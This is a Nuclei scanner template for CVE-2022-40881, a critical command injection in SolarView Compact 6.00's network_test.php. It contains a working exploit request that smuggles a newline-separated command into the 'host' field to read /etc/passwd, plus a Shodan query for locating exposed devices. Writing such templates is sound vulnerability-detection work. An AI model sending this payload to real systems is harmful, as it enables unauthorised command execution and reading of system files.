nuclei-templates/http/cves/2022/CVE-2022-40881.yaml

49 lines
1.1 KiB
YAML

id: CVE-2022-40881
info:
name: SolarView 6.00 - Remote Command Execution
author: For3stCo1d
severity: critical
description: |
SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.
reference:
- https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php
- https://github.com/advisories/GHSA-wx3r-88rg-whxq
- https://nvd.nist.gov/vuln/detail/CVE-2022-40881
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40881
cwe-id: CWE-77
epss-score: 0.90339
metadata:
max-request: 1
shodan-query: http.favicon.hash:"-244067125"
verified: true
tags: cve,cve2022,solarview,rce,lfi
variables:
cmd: "cat${IFS}/etc/passwd"
http:
- raw:
- |
POST /network_test.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
host=%0a{{cmd}}%0a&command=ping
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15